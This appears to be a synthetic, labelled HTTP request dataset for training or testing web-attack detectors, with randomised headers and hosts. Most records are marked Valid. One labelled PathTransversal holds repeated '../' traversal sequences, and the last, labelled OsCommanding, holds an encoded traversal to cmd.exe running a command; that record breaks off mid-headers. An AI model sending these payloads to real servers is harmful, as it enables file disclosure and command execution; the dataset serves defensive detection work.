~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35095
Start - Id: 12166
class: Valid
GET /ip/h.21ETGX4where.htm?cah=089&dibtayGirEevo=e64nIn&To=05161&uonei=b2uform&euo=574&rhre8ou=39572&xQsUiuif=%3DHd4nc+I2oai8%3Dstyle%26+le&P3idIlyPX=lyainclude&stbt=hRrsc%3Fifs&srgrvme=ditu&esusfl=albtX2&chllrhte=81226&GcseatwjrLn89=Ht+%7Ci%3C+h HTTP/1.1
Host: 191.169.247.86
Connection: eteso
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.9, identity;q=0.3, gzip;q=0.0, deflate, compress
Accept-Language: 7O-eadH;q=0.2, tehlvi-rsdf;q=0.2, ceT-kNn
Cache-Control: max-age=145
Client-ip: 103.226.92.182
Cookie: d68=aogsbWs93teo4i;ath3estEoNpset=631;6deoihe0thw=86482;tielTTrst3iahj=13721;oaredeetmoadds=eVhqd;tthrNdrctnrtnDa=aPmPoe nn5hr~i
Cookie2: $Version="64"
Date: Fri, 12 Mar 10 07:04:19 CET
ETag: "vP5WyXiK_Ogb6z9m@"
Expect: 100-continue
From: igfh@oshdsiel.net
If-Modified-Since: Mon, 06 Dec 04 18:50:49 UTC
If-Unmodified-Since: Tue, 21 Jun 05 02:32:48 UTC
If-Match: "t5dlC4wLmdfAdkwC"
If-None-Match: "sB3A8xNpk@@P6ktyvti"
If-Range: *
Max-Forwards: 5
MIME-Version: 1.4
Pragma: ey3taii='4E'
Proxy-Authorization: lert mmeei=fdhn
Authorization: Digest username="Ce7dTla"
Range: 807559-8320
Referer: /gdem/emsKs.exe
TE: gzip;q=0.5,trailers
Trailer: Host
User-Agent: Mozilla/8.0 (Windows; U; Windows NT 9.1; tW-mE; rv:5.8.6) Gecko/93060505
UA-CPU: 68000
UA-Disp: 908,936,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 5894x857
Via: 7.1 199.40.158.115, ansee/2.9 109.89.142.205
Transfer-Encoding: identity
Upgrade: baheen/8.2, os6u/6.0, sloeee/4.4
Warning: 799 56.216.155.145 "xcmStingtiLaa" 
X-Forwarded-For: 215.199.241.153
X-Serial-Number: 99725023233624761
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12166
Start - Id: 6778
class: Valid
POST /lc/ilectu/eljPYfJsm61DhlcP/eB7qLM0Al6yUeKON/yADPGYasl/rx/wbetweenGzreplacepOJ@scriptOYV-t.php4? HTTP/1.1
Content-Length: 149
Content-Language: ns,oAc
Content-Encoding: deflate
Content-Location: http://www.oaogO.it/orrsu/iUnees4/eHiri.dll
Content-MD5: c2lSdXJveWNldWVlN3Rvcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 30 Oct 05 12:28:13 UTC
Last-Modified: Thu, 02 Apr 09 05:45:44 UTC
Host: www.rbEetdsr.be
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: ycsa-poi;q=0.7, ttz-clsNdi;q=0.8, keeis6U-WDisusin;q=0.5, dobE-iedfeeys;q=0.7, ouzshbe-l
Cache-Control: tbr='ws'
Client-ip: 208.227.85.150
Cookie: ereuG3a2ndeosHo=i2TX
Cookie2: $Version="6"
Date: Fri, 07 Apr 06 01:15:20 UTC
ETag: "qXmOYNfiyjf3O5R"
Expect: efeleh
From: oisbr@Wgoiel.fr
If-Modified-Since: Mon, 07 May 07 06:35:09 CET
If-Unmodified-Since: Wed, 08 Jun 05 12:36:01 GMT
If-Match: "RTj3NZyf_DGSzhOef"
If-None-Match: "I-0A722iCfp59poTfV"
If-Range: Mon, 24 Oct 05 03:12:38 UTC
Max-Forwards: 19
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: 2717qy Pe4an=p0l4e
Authorization: Digest nonce
Range: -483
Referer: /OtE1ld/Eiegv/stpa/itrdgnc/rAene.mpeg
TE: chunked;q=0.1,chunked;q=0.6,gzip
Trailer: Pragma
User-Agent: Mozilla/9.3 (X11; U; Linux i386 3.3; ih-ys; rv:9.9.8) Gecko/35344069
UA-CPU: 68000
UA-Disp: 610,0382,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3268x616
Via: 8.9 18.134.7.38:8
Transfer-Encoding: Uer9
Upgrade: wetlti/0.9, ndo/4.0, Ralc/5.4, 4tt/7.6, ogib0/1.3
Warning: 967 196.110.31.176 "steteazmyrenN7eot" "Wed, 15 Nov 06 02:04:00 GMT"
X-Forwarded-For: 191.106.203.155
X-Serial-Number: 385360968
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rLhmnt=dvEi7&l5EegBYFK.i=nmloion4iesova&C8pR_Ue@.a=9reoee0qe&s7aurndtoaSeit=1930&htiBr3=5155790&ennuti=842&oeuee8qt=escacceptriy2binyc&8eaexrTruaEa=u

End - Id: 6778
Start - Id: 45541
class: PathTransversal
GET /girnoydLanems3t/n_dgn3.bin?gIsetmlaw=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fyo.bat&enOr7chtEacou=s9srpzy+vut HTTP/1.0
Host: www.newsLul.cz:80
Connection: ghtrSn0
Accept: image/gif;q=0.3, text/xml
Accept-Charset: cp-936;q=0.3, x-mac-korean;q=0.4, hz-gb-2312;q=0.1, windows-1254;q=0.9
Accept-Encoding: gzip;q=0.4, identity, identity, deflate;q=0.5
Accept-Language: *
Cache-Control: max-age=8071
Client-ip: 189.238.147.1
Cookie: nbHn=wqe;YYzyuou_tPpf=cwbuse;Rk2deletestyleE0c7Jkf= leg
Cookie2: $Version="616"
Date: Sun, 22 Feb 09 02:52:31 GMT
ETag: "_4i.sK62g09@pXchU"
Expect: risLed=ttyu;ktgn0r8=sEtyhds
From: muibee@Egtuem.uk
If-Modified-Since: Sat, 29 Oct 05 24:01:28 UTC
If-Unmodified-Since: Tue, 12 Jun 07 23:57:51 GMT
If-Match: "Ei-1w8cESN8ZjMTSry"
If-None-Match: *
If-Range: Thu, 01 Apr 04 16:49:45 UTC
Max-Forwards: 66
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: enba eOsywabt=bulrtl
Authorization: Basic b2U5bjpvbGVwaW9t
Range: 903-3,3-4324,-8
Referer: http://www.lli5.fr/rpeiNq/w2e2/3oeto/e2eaeh.mspx
TE: trailers
Trailer: Accept-Language
User-Agent: eK3ENF http://www.amsncj5.st
UA-CPU: 68000
UA-Disp: 6548,353,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 428x2742
Via: 7.3 52.220.12.189
Transfer-Encoding: gzip
Upgrade: vleih/1.8, zzq/8.8, etwstn/4.5, eseo/9.8, ilezr/6.6
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 145.196.47.34
X-Serial-Number: 2215888867609
----: -------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 45541
Start - Id: 14448
class: Valid
GET /a4v6ea4tenen8eh/qr3ds/childWr96m.K/fIRlP03/eKa-ejw4K2f@QkHZPDF/nnnmfnoAectb4slytsgg/v7DblkZ/nsetaCzvz/e.EPBqYCxaITn2Os03/ix/h69bsdieSTdrrizw/Ipopt.pl?43liORituNi=8&UcmdIT@passwdh=ue9&ehdtcyir9gg9ri=ttaNeval%3Es&hhumiaElUs6=r%2Bt%2Fpaautoexecenvbscriptho0at HTTP/1.1
Host: www.TTnpAyllse.gov
Connection: close
Accept: */*;q=0.3
Accept-Charset: macintosh, windows-874, iso-8859-9, x-mac-icelandic;q=0.0, windows-1251;q=0.3
Accept-Encoding: 
Accept-Language: llxedt-ygl6t, xexvbcy-lean48i;q=0.3
Cache-Control: fepnto=n6vrPi
Client-ip: 255.146.199.17
Cookie: RBw7Y=tiaihs0nc;dsiesbie=DsaRe;onsx8aoNIts0m=99717543
Cookie2: $Version="15"
Date: Tue, 25 Oct 05 16:29:45 UTC
ETag: W/"jDK252a@c3hzQddGNCD"
Expect: 100-continue
From: inuozal@th8rsa.cz
If-Modified-Since: Tue, 06 Dec 05 05:43:24 CET
If-Unmodified-Since: Tue, 16 Jun 09 13:38:14 UTC
If-Match: "qTAMkO9ZMrqDareTGRBI"
If-None-Match: *
If-Range: Fri, 14 Oct 05 06:19:41 CET
Max-Forwards: 924
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: oa7d0 neletwg=tdqaeth
Authorization: Basic cm5Hcm5zcjphcnRyY3Rh
Range: -517,627-,587-701
Referer: http://www.ehyrvos.de/olOour/SmuuSgi.swf
TE: gzip;q=0.9,deflate;q=0.7
Trailer: Cache-Control
User-Agent: Mozilla/2.7 (Windows; U; Win98 3.7; bq-rx; rv:0.3.6) Gecko/94583856
UA-CPU: 68000
UA-Disp: 3006,633,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 5927x518
Via: HTTP/3.9 246.65.10.128
Transfer-Encoding: identity
Upgrade: sto1p/1.0, hfv5l/3.0
Warning: 847 183.112.194.21 "jRtnvs4nlix" 
X-Forwarded-For: 224.226.145.150
X-Serial-Number: 309851
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14448
Start - Id: 26316
class: Valid
GET /gxktn/uusys2Soxtxseen/tSlsha1t/hl/qu9eja@6Pf/6PL5OAYRbaGmqtk/ezclGIH-/v.jERLe3XtCNG0/aZY3IGetcmbfdocumentKzconnect/aVuab8cAua.cgi?LhYKP=s28Wlv_U&iaeyeaogigt=7Bzh4j&rrrsabitfqe7a=cgs&4Tt=02&sspneihnteu=wH0iaaeiqdl&iua3aoieep=v%2Bi4oinsert&ohwtuSstih=oh%2Fcfsama%2BkL%2Foapasswd%26&pRrN=be&tethduaetJion=549201 HTTP/1.0
Host: www.aticpe.fr:1
Connection: lptETlL
Accept: */*
Accept-Charset: iso-2022-kr;q=0.4, windows-1250, macintosh, x-mac-greek;q=0.5
Accept-Encoding: identity;q=0.1, deflate;q=0.8, identity, gzip;q=0.7
Accept-Language: yLdl-sosnsh;q=0.0, ui8e-mmtehsr
Cache-Control: no-transform
Client-ip: 249.223.250.58
Cookie: ed.QFselect=330;eqa2=rXJ1_-_GuJu
Cookie2: $Version="39"
Date: Thu, 19 Oct 06 02:41:24 UTC
ETag: W/"iesAiAJ8ezqwaS59rXB"
Expect: 100-continue
From: teed6sis@nesteei.biz
If-Modified-Since: Sat, 29 Oct 05 20:07:19 CET
If-Unmodified-Since: Fri, 07 Mar 08 16:45:52 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 24 Oct 08 23:04:34 CET
Max-Forwards: 909
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM dG9rbnRlbWdld3R0MXNsbHRubmJSbmx0bTZhY3JncGV4RWc2NGV5b2VhcmU=
Authorization: 3m5n otelciRy=bres
Range: 2-,592-3402
Referer: /LiiAs2El/0iieiog/modtKe/snaaa.msf
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: Mozilla/1.9 (Machintosh; U; Mac OS X 2.9; sb-ls; rv:0.7.5) Gecko/33862575
UA-CPU: StrongARM
UA-Disp: 417,8223,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 8605x7304
Via: 7.0 www.bnbCAtua.htm:2083
Transfer-Encoding: deflate
Upgrade: tzs/4.9, l7ae/3.7, has/3.5, ran/9.1, Cpya/7.3
Warning: 064 237.173.123.20:81 "meenev2" "Mon, 28 Jan 08 01:16:01 CET"
X-Forwarded-For: 212.21.79.197
X-Serial-Number: 8772849575
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 26316
Start - Id: 9358
class: Valid
GET /aPFbobJ/eVl5OP/AJoc05uugQ/aUWEzaC@YexgL10Uib8/gBL/fbthainnyTinPi8et2t/7CSQbDtD/bwucsUs6DmC3O3_zcALZ/ast7earlgokhth/aj3SqanNBcsm@-.js?ucntear=boot.iniartR4%25r+cia&e5Bnvsabnsd=eGGWJWZ&6tz=a&8uo5tSrdvnayGb=1948732&btoa=mihN%3EerIerws HTTP/1.1
Host: 84.122.156.4
Connection: ilpct
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.1, identity;q=0.1, identity;q=0.2
Accept-Language: *;q=0.6
Cache-Control: min-fresh=8
Client-ip: 52.95.17.42
Cookie: jxk_= iire@tee3cshutdowno;K1DR=rTdrophi
Cookie2: $Version="5"
Date: Sun, 13 Sep 09 19:03:57 CET
ETag: "CEdbrNf.khErt0b"
Expect: gEwhEed=lqmenxb
From: eiwO@auloheeet.uk
If-Modified-Since: Sat, 13 Jan 07 23:46:45 CET
If-Unmodified-Since: Tue, 22 Mar 05 09:38:54 UTC
If-Match: *
If-None-Match: "Ao3eGAoHl4Ett-MoHem3"
If-Range: "320k3CIIP6CH@8hdLb"
Max-Forwards: 8776
MIME-Version: 3.5
Pragma: alhb86='iLn'
Proxy-Authorization: OdcSix ayHxs=easseTwo
Authorization: Basic dW9hYXg6aHM5c3N1
Range: 446262-
Referer: /Iocxtl.css
TE: chunked,deflate;q=0.5,trailers
Trailer: If-Range
User-Agent: Mozilla/5.4 (X11; U; Unix 8.8; Mn-im; rv:0.1.4) Gecko/49095505
UA-CPU: Sparc
UA-Disp: 6680,235,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4908x484
Via: 8.9 142.82.114.125, 0.8 14.204.49.93, 2.4 www.4teehe.jpeg
Transfer-Encoding: gzip
Upgrade: r76ci/2.9, b34o/1.0, Rco/2.1, tqi/3.8, elk/3.0
Warning: 450 www.Oox1sn.shtml "hEnhegeYhoEhdatS" "Fri, 15 Aug 08 17:00:58 CET"
X-Forwarded-For: 74.205.168.33
X-Serial-Number: 169179883
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9358
Start - Id: 24459
class: Valid
GET /tNqj/eh7Sjg0cKHFeRPQ@/9ca/mailUXwinntoptRGE/8ieetamnfpJh20Benhas.mspx?tE=tWjcwEEqy&swdtedktrbg=21270449&foa8heaate3=z&rOz9ea=33110521 HTTP/1.0
Host: www.eussep.ch
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic, koi8-r, koi8-r
Accept-Encoding: identity;q=0.0, identity, gzip;q=0.4, gzip
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 60.13.48.217
Cookie: jd9mi2hOclospuc=oeOt0execnperlxeS;NSmhn=&uusre
Cookie2: $Version="8"
Date: Thu, 17 May 07 14:14:35 GMT
ETag: "L7.MGOCMhvEcaCCmm_j"
Expect: 100-continue
From: rC9g@zaeslhesaa.com
If-Modified-Since: Sun, 11 Jan 04 04:45:44 CET
If-Unmodified-Since: Sat, 13 Sep 08 17:37:57 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 22 Sep 04 20:58:42 GMT
Max-Forwards: 8
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest username="esafneap"
Authorization: NTLM VXp0TmRlcnp0bmxuaDJmbmdhdHVvc3hkb3dycGVodFloaW1lbm9kZXN0OA==
Range: 10-87
Referer: /creNa/eenchs/8Ey6T.jpg
TE: deflate;q=0.3,trailers
Trailer: Transfer-Encoding
User-Agent: aiedgbh
UA-CPU: MIPS
UA-Disp: 200,0703,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 017x848
Via: 1.3 16.253.236.173
Transfer-Encoding: gzip
Upgrade: hlnw/4.2
Warning: 088 www.eodr.jpeg "rhhnDc5u" "Tue, 06 Sep 05 21:39:36 UTC"
X-Forwarded-For: 213.50.40.93
X-Serial-Number: 782387
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24459
Start - Id: 24389
class: Valid
GET /d8mettzqn9op4JaI/e91i3oobnS/ijeOVsots/ma/UhsquonexecR/xzesos/3angdstnl4cy/ay09/xcUV/xEtgteaica0rnpir4rni.php3?yA9wur=613307&Do5ihis=ctwdmmebaRu9leldah&Rk_BsIEyS=tnm&un=i%3Ai&eobtosoiO=o&iEsguynhzm=tr+to%2BusehA%3F+%2B+eg%3Fu+&ri5A8E7=%7E%5D&ad=hPc1nkj7UUbK HTTP/1.1
Host: 84.183.190.64
Connection: OReo
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: ssnaf-xos, y6nl-7aaa9Tvg, nlSau4-oErcz0;q=0.3
Cache-Control: min-fresh=959
Client-ip: 248.165.100.251
Cookie: KQLTAQ_T@usrUG=35153;emmavic6evwf5=tnTEZ_q0u;childJ@OFMN=libhe
Cookie2: $Version="186"
Date: Sat, 03 Sep 05 24:04:14 CET
ETag: "9dciFh3KeV@7.KxaU4"
Expect: cNyhm=tkhT
From: 4oaza@iySeden.it
If-Modified-Since: Wed, 05 May 04 01:12:32 UTC
If-Unmodified-Since: Mon, 12 Jan 09 12:21:59 CET
If-Match: "4iWq2LwmBajC4HkWh1w1"
If-None-Match: *
If-Range: Sun, 06 Aug 06 18:42:09 GMT
Max-Forwards: 816
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Z4ne on7b=txiesh
Authorization: Digest qop=auth
Range: 1-,-5350
Referer: /nteknh/pnaeaso/wIgllo.gif
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/6.3 (X11; U; Open BSD i586 6.5; rh-wh; rv:9.4.6) Gecko/20131326
UA-CPU: 68000
UA-Disp: 801,8735,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1274x3966
Via: u8h/5.8 221.240.34.116, FTP/2.4 187.179.21.91:825
Transfer-Encoding: deflate
Upgrade: bf6/1.0, t7Oteo/2.2, sdo/9.0, olyo2o/7.4, ivryva/4.0
Warning: 583 www.digi.js "ep3nn0retlwyt" "Wed, 24 Dec 08 19:28:30 CET"
X-Forwarded-For: 231.128.57.40
X-Serial-Number: 2633787147170718759
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24389
Start - Id: 29480
class: Valid
GET /ruhlo8snNgbitmgKTRe/0bnusref6phi/VhYeretBsa/isnrigt4s/epgae2haverlaro/cgisrgiticofoiAtws4/t4b/tyiearej4u.shtml? HTTP/1.1
Host: 16.185.98.61:217
Connection: keep-alive
Accept: image/*
Accept-Charset: us-ascii;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: min-fresh=2
Client-ip: 73.184.178.164
Cookie: op=cs;fQrt15liketh=itankR715Y;ce7a=CEoCih;0YUFalld=o+en
Cookie2: $Version="77"
Date: Sun, 20 Nov 05 11:12:01 CET
ETag: "rP_HYsYeJhUOLapDqxVN"
Expect: 100-continue
From: hnoyso@ioJaegaa.st
If-Modified-Since: Tue, 15 Jan 08 23:38:38 UTC
If-Unmodified-Since: Mon, 13 Sep 04 16:47:48 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 02 Apr 06 01:20:09 GMT
Max-Forwards: 299
MIME-Version: 7.2
Pragma: ocom='sur'
Proxy-Authorization: gAce Eitt8eae=elt3
Authorization: NTLM andmZW50amo4NHRsZWVub2F0Y2RvYW1odHJlODBsc2FzRU5s
Range: 6551-
Referer: http://EPesy.gov/heMretc/9pmegrrd/tlhcnp/notsn.swf
TE: trailers
Trailer: Connection
User-Agent: edk2e (tIeYvpu; ls21TunwJH; 8-ef3zeND)
UA-CPU: Sparc
UA-Disp: 3759,7587,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 412x970
Via: 3.7 90.50.190.74
Transfer-Encoding: compress
Upgrade: nene/2.6
Warning: 397 74.229.205.213 "xet4unMadnhi1m7sg" "Sun, 08 Nov 09 23:21:56 UTC"
X-Forwarded-For: 160.172.24.250
X-Serial-Number: 801273405
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29480
Start - Id: 18078
class: Valid
GET /dn9srah/erdUop1Wjggju-0/aTwKqN/_deleteDUO/dSuefi9havingtj/3Eur4X7lKmR/yitjbo1nleloTilu/ohaciicusmdeyarvhear/dNizq_Z4aImrjh/iwotditAhvAeixe3mr.exe?hsdn2reetr=SwTNuar5rHSr0lmr&wlipGiodlruixV=2 HTTP/1.0
Host: 189.12.133.66
Connection: ylgoe4
Accept: */*;q=0.2
Accept-Charset: macintosh, cp-936;q=0.9
Accept-Encoding: *;q=0.0
Accept-Language: umendElt-bBoeet;q=0.8, od-wsvid
Cache-Control: max-age=72935
Client-ip: 211.175.152.169
Cookie: eeihadmEnAi=laapeint;bpaasyerbzdt1bs=725;iis= T7 n
Cookie2: $Version="5"
Date: Tue, 02 Jan 07 06:08:11 UTC
ETag: W/"eHmW0mNcEda-3Z5u"
Expect: ofxe=mtueeg;ehupn=hvihrc
From: dunw9ir2@r7eer.cz
If-Modified-Since: Sat, 06 Jan 07 12:21:14 UTC
If-Unmodified-Since: Fri, 02 Jun 06 14:58:33 CET
If-Match: *
If-None-Match: "sb@4TUnYGdfCbCvdA"
If-Range: Sat, 08 Aug 09 17:39:03 GMT
Max-Forwards: 9
MIME-Version: 9.3
Pragma: ianuak='ee5jo'
Proxy-Authorization: Basic YWhnZGE6bmlpN1R0
Authorization: NTLM RXRhRUlMdGQ0bWVjT2lnYWVzZmQxb284VWxhYW5zc2Uzd2pybWU=
Range: 05487-,314421-,-1481
Referer: /Gya8te4/0tmtnenn/taogod6.html
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/9.4 (X11; U; Linux i586 6.7; bh-mb; rv:9.8.5) Gecko/71780630
UA-CPU: MIPS
UA-Disp: 9424,5309,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 519x975
Via: 2.7 121.56.77.11, ae77a/2.9 202.139.88.22
Transfer-Encoding: compress
Upgrade: pcVooi/8.0, teny6/2.3
Warning: 503 www.hsysi.tiff "iemiTeeaMfeimtrpbzda" "Fri, 05 Oct 07 14:17:28 UTC"
X-Forwarded-For: 31.128.239.22
X-Serial-Number: 507009022926065
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 18078
Start - Id: 29373
class: Valid
GET /ossyaXsop/0buOdBT/too/aTSHDle700ns.tiff?ssey48=3106379&Lsom3oa2sfdiuwm=95&Mwzjpsock_streamT=oltiTrlhdLrR5cnw&alouoifeli8n=eihhadNyySoEtd&nenueey=ssetddstlu1amtua HTTP/1.0
Host: www.tL8bn.ch
Connection: close
Accept: application/postscript;q=0.7, video/*;q=0.4, application/*;q=0.5
Accept-Charset: shift_jis, x-mac-roman, x-mac-roman;q=0.7
Accept-Encoding: compress, compress;q=0.2, identity, identity;q=0.3
Accept-Language: *
Cache-Control: min-fresh=1505
Client-ip: 171.85.6.239
Cookie: IWbFnullXSselectJjm=9
Cookie2: $Version="515"
Date: Fri, 15 Dec 06 19:35:48 CET
ETag: W/"fA3ZKS2Ci0QFLw9dz13"
Expect: srdagi=aiziR;eotA=hhtsgq8o
From: Snuhnht@r9nesdIkt.it
If-Modified-Since: Mon, 29 Nov 04 11:20:34 CET
If-Unmodified-Since: Fri, 24 Apr 09 14:49:57 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 08 Aug 05 03:31:54 CET
Max-Forwards: 0889
MIME-Version: 3.1
Pragma: nb=jcVshai
Proxy-Authorization: jYqi3 eItsacn=9a9eiess
Authorization: Digest cnonce="sh3qostn"
Range: 60-931,-49,8-736
Referer: /mn1ai/t9ctDeh/uhq1e/2tdyi/lihw.msf
TE: trailers,chunked,deflate
Trailer: Accept-Charset
User-Agent: y8cEq (aUK46q7.j; dRYUxZ; aUecXD)
UA-CPU: StrongARM
UA-Disp: 468,4853,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 183x157
Via: HTTP/1.0 0.24.75.12, 6.0 65.110.151.57
Transfer-Encoding: gzip
Upgrade: iaepj/3.1
Warning: 369 99.232.247.89 "tt4ao8Ao9o1ecNBed" 
X-Forwarded-For: 10.176.141.74
X-Serial-Number: 725402
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 29373
Start - Id: 23045
class: Valid
GET /it5ost/fohwruinslpwr5s/ENOF/n9zAvC5i7oQOHJh/toeealrdd/05_PW8VoWw-oMppmN.nsf?hopN1lant=9665097&Nn0osolCeesclL=d&bsonbdyu=1372881&8hrceAyeuqcmt=htacceshttpwinnt&i9Wr=fshimecsaandeiaiit HTTP/1.1
Host: www.ehU7EOon.be
Connection: keep-alive
Accept: video/mpeg;q=0.8, text/*;q=0.3, audio/*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: msiso-Na8p0, RA-niah, a-i1pt;q=0.0, mplw-tkes;q=0.7, o-oaaha
Cache-Control: no-cache
Client-ip: 235.218.136.72
Cookie: goKztT=1GQMzFvsW;aL=lxRUEoD;eyoadxlsuyahpo=a 6ivntelnetdf;iw=38945593;@7lNN9ZF=tamh
Cookie2: $Version="511"
Date: Sun, 23 Oct 05 09:42:07 GMT
ETag: W/"n5AlUPX6@foZc5J"
Expect: 100-continue
From: itlt@Trihh.org
If-Modified-Since: Sat, 12 Sep 09 06:44:13 UTC
If-Unmodified-Since: Fri, 19 Nov 04 13:34:26 UTC
If-Match: *
If-None-Match: "O7UN0KJS@ISXtwjzIXSM"
If-Range: Sun, 21 Jan 07 17:52:21 CET
Max-Forwards: 1846
MIME-Version: 2.9
Pragma: v=ek7
Proxy-Authorization: aeTei e5umtiha=e96omtou
Authorization: NTLM cm82NjZ0ZGxoc2VBUnRyczI2enQyZ3YzbnJzZXhmZWMwY2RyT0hockhuYWQ=
Range: -41
Referer: /rtpogU/rqMq.jsp
TE: gzip;q=0.9,gzip;q=0.1
Trailer: From
User-Agent: Viies (uCjGpMS3f; 9idjwVWsSh; mvhwkuUpN; mee.Iy; e.5fisS)
UA-CPU: x86
UA-Disp: 8779,521,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6076x9120
Via: HTTP/5.5 www.iasDRaa.html, FTP/4.1 www.eTeehepu.css, ant5ks/5.3 59.157.153.143
Transfer-Encoding: identity
Upgrade: hjG/0.3, nce65/6.8, e8Uee/4.6
Warning: 333 9.162.131.93 "Ealtwieflwome" 
X-Forwarded-For: 55.241.109.189
X-Serial-Number: 103102
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 23045
Start - Id: 21372
class: Valid
GET /e./eSZ8udf3Q-HgW9uKR0ee/oaiel/nTrGNiDeXi/acceptzmMs/6oiva6hmiydqea/QNGK/cLjjy8P/xS-2sadminKB/a3idY1dTinputfH_etc7A/l_Ul0k1a7/uK2mFkGJu.css?SH7Rjy-bin@style=hUWOL HTTP/1.0
Host: 212.62.244.113
Connection: close
Accept: image/gif, audio/*;q=0.8, image/gif
Accept-Charset: ks_c_5601-1987, utf-8, windows-1254;q=0.4
Accept-Encoding: 
Accept-Language: rNaiw-te;q=0.4, cd-dt, ysiloao-fw;q=0.1, mcgo-tp;q=0.0
Cache-Control: only-if-cached
Client-ip: 112.64.93.82
Cookie: ni=87981316
Cookie2: $Version="4"
Date: Sat, 12 Sep 09 09:43:55 GMT
ETag: "NH-4d06ZBYMuVX6"
Expect: ezar=d7sn78s;jHiunets
From: wSnot@nmmhdasc.de
If-Modified-Since: Tue, 16 Nov 04 11:21:42 CET
If-Unmodified-Since: Sat, 22 Nov 08 18:10:25 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 21 May 08 23:03:11 UTC
Max-Forwards: 1786
MIME-Version: 6.5
Pragma: ac=nEe
Proxy-Authorization: 7thhs liLSg=Ghuqmjra
Authorization: Basic Nm9zTFM6aFJpZXU=
Range: -510,-15,91865-958
Referer: http://hsnn4o.st/l5efAdst/drvr.php3
TE: deflate;q=0.5,gzip;q=0.7,trailers
Trailer: Range
User-Agent: 1NAya9 (d3Upac_cpK; tPK2.ma; dtDciVfJ; tZpV2bGLi; ctB8M_y4)
UA-CPU: PowerPC
UA-Disp: 3983,8389,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 945x442
Via: 8.7 237.246.111.184:3
Transfer-Encoding: deflate
Upgrade: ehr5t1/8.1, ans/4.0, Pae/6.5
Warning: 104 201.244.255.0 "TtHe7ldEfrh" "Sun, 27 Jan 08 03:21:34 CET"
X-Forwarded-For: 86.182.5.47
X-Serial-Number: 2418413
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 21372
Start - Id: 36448
class: OsCommanding
GET /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.Unsa4s.org
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: ieoahil0-inos7g;q=0.0, s-pe
Cache-Control: no-cache
Client-ip: 144.216.33.215
Cookie: ia=301;a4ufrnykor=355;YoZ6B56W_dQJ=%kae
Cookie2: $Version="0"
Date: Tue, 20 Oct 09 24:38:43 UTC
ETag: W/"QcQUC6TnA4cSdTY9asB"
Expect: ze8optsx=9asowa
From: u3u4saNf@h5ldevB.be
If-Modified-Since: Sun, 04 Apr 04 18:58:46 UTC
If-Unmodified-Since: Sat, 02 Sep 06 04:34:26 UTC
If-Match: "YrTK_IhAwjNM-PDjj"
If-None-Match: "WMQSazlu06TWlpGTgg"
If-Range: Tue, 08 May 07 18:49:49 UTC
Max-Forwards: 0777
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: NTLM RWVsZ1R0YXFwdGRyaDNhaWFpaVFnaWhtc0VwMm5vYTFsZ2FpZWNheXB0c2c=
